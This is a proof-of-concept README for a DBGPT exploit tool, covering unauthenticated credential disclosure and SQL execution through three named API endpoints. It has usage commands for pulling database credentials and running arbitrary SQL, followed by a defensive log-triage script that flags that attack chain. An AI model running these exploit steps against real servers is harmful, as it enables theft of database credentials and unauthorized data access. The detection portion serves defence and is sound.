## https://sploitus.com/exploit?id=C5FBFC37-5494-521E-B114-650D7804C396
# DBGPT Unauthenticated Information Disclosure & SQL Execution PoC
## Vulnerability Description
This tool integrates scripts for exploiting two critical vulnerabilities in DBGPT, which involve sensitive information disclosure and unauthorized SQL execution.
### 1. Sensitive Information Disclosure
- **Vulnerability ID**: CNVD-2026-12436 / CVE-2024-10835 (associated)
- **Vulnerable APIs**: `/api/v2/serve/datasources`, `/api/v1/chat/db/list`
- **Impact**: Unauthorized attackers can directly access database configuration APIs and obtain sensitive information such as database host, port, username, and **plaintext passwords**.
### 2. Unauthenticated SQL Execution
- **Vulnerable API**: `/api/v1/editor/chart/run`
- **Impact**: Attackers can use the leaked or guessed database name (`db_name`) to construct malicious chart generation requests, allowing them to execute arbitrary SQL statements in the target database.
## Requirements
- Python 3.x
- requests
```bash
pip install requests
```
## Usage
```bash
python dbgpt_poc.py -u [options]
```
### Parameter Explanation
- `-u, --url`: Target DBGPT server address (e.g., `https://dbgpt.example.com`)
- `-s, --sql`: SQL statement to execute (default: `SELECT VERSION();`)
- `--db`: Database name to exploit (optional; if not specified, the script attempts to extract it from the leaked data source list)
## Examples
### 1. Automatic Detection and Verification
The simplest usage allows the script to automatically attempt to obtain database credentials and execute a version query on the first discovered database.
```bash
python dbgpt_poc.py -u https://dbgpt.example.com
```
### 2. Executing Custom SQL
To obtain the current database user:
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SELECT user();"
```
To list all table names:
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --sql "SHOW TABLES;"
```
### 3. Specifying Database Name
If automatic detection fails but you know the target database name (e.g., `dm_manufacturedb`):
```bash
python dbgpt_poc.py -u https://dbgpt.example.com --db "dm_manufacturedb" --sql "SELECT VERSION();"
```
## Disclaimer
This tool is intended for security research and authorized testing purposes only. Use is strictly prohibited for illegal attacks. Any consequences arising from using this tool are the responsibility of the user.
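## Detecting Exploitation Attempts
The following is an added defensive example, not part of `dbgpt_poc.py` or of DBGPT itself. It triages web-server access logs for the three endpoints named in the vulnerability description above (`/api/v2/serve/datasources`, `/api/v1/chat/db/list`, `/api/v1/editor/chart/run`) and ranks first any source that read a disclosure endpoint and then called the chart-run endpoint with a success status, since that sequence is exactly the credential-leak-then-SQL chain the PoC automates. It assumes logs in Apache/Nginx combined format and a deployment where these endpoints are not meant to be reachable without authentication; the log lines embedded below are constructed sample data, not real traffic.

```python
"""Access-log triage for the DBGPT endpoints named in this advisory.

Added defensive example; not part of the dbgpt_poc.py tool. Assumes logs in
Apache/Nginx combined format and a deployment where these endpoints should
not be reachable by unauthenticated clients.
"""
import re
from collections import defaultdict

# Endpoints from the vulnerability description above.
DISCLOSURE_PATHS = {
    "/api/v2/serve/datasources": "datasource config disclosure (credentials)",
    "/api/v1/chat/db/list": "database list disclosure",
}
EXECUTION_PATH = "/api/v1/editor/chart/run"  # arbitrary SQL via chart generation
WATCHED = {**DISCLOSURE_PATHS, EXECUTION_PATH: "SQL execution via chart run"}

# Combined log format prefix: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Drop the query string and trailing slash so path comparison is exact.
    rec["path"] = rec["path"].split("?", 1)[0].rstrip("/") or "/"
    rec["status"] = int(rec["status"])
    return rec


def find_hits(lines):
    """Return every request to a watched endpoint as
    (ip, ts, method, path, status, reason)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] in WATCHED:
            hits.append((rec["ip"], rec["ts"], rec["method"], rec["path"],
                         rec["status"], WATCHED[rec["path"]]))
    return hits


def chained_sources(hits):
    """Source IPs that successfully (2xx) read a disclosure endpoint AND called
    chart/run: that is the full read-credentials-then-run-SQL sequence, so these
    go to the top of the triage queue."""
    paths_by_ip = defaultdict(set)
    for ip, _, _, path, status, _ in hits:
        if 200 <= status < 300:
            paths_by_ip[ip].add(path)
    return sorted(
        ip for ip, paths in paths_by_ip.items()
        if EXECUTION_PATH in paths and paths & set(DISCLOSURE_PATHS)
    )


# Constructed sample log lines (not real traffic); one line is deliberately malformed.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2026:10:01:02 +0000] "GET /api/v2/serve/datasources HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
10.0.0.5 - - [12/Mar/2026:10:01:03 +0000] "POST /api/v1/editor/chart/run HTTP/1.1" 200 231 "-" "python-requests/2.31.0"
192.168.1.20 - - [12/Mar/2026:10:02:10 +0000] "GET / HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Mar/2026:10:02:11 +0000] "GET /static/app.js HTTP/1.1" 200 55021 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2026:10:05:00 +0000] "GET /api/v1/chat/db/list?page=1 HTTP/1.1" 200 300 "-" "curl/8.0.1"
10.0.0.9 - - [12/Mar/2026:10:06:00 +0000] "POST /api/v1/editor/chart/run HTTP/1.1" 401 0 "-" "curl/8.0.1"
garbage line that does not parse
"""

if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG.splitlines())
    for h in hits:
        print("%s %s %s %s -> %d (%s)" % h)
    print("chained sources:", chained_sources(hits))
```

Run it against a real log with `find_hits(open("access.log"))`; any 2xx hit on the disclosure endpoints from a client that never authenticated is itself worth an alert, and `chained_sources` narrows that to clients that also went on to run SQL.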